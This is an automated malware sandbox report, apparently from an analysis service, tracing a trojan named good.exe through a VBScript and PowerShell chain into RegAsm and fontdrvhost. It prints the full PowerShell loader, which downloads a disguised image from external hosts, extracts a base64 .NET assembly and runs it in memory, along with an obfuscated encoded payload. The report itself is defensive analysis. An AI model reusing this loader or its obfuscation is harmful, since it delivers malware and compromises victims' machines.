                    Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@18/8@2/3
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731916CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF731916CA4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731911C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF731911C0C
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319166C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF7319166C4
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731917AC8 FindResourceExA,LoadResource,DialogBoxIndirectParamA,FreeResource,0_2_00007FF731917AC8
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-609f1fed-de85-1505dc-3df414f63d63}
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                    Source: C:\Users\user\Desktop\good.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: C:\Users\user\Desktop\good.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fwr.vbs
                    Source: good.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\good.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                    Source: good.exeReversingLabs: Detection: 18%
                    Source: good.exeVirustotal: Detection: 22%
                    Source: unknownProcess created: C:\Users\user\Desktop\good.exe "C:\Users\user\Desktop\good.exe"
                    Source: C:\Users\user\Desktop\good.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fwr.vbs
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs"
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676
                    Source: C:\Users\user\Desktop\good.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fwr.vbsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: feclient.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\good.exeSection loaded: advpack.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
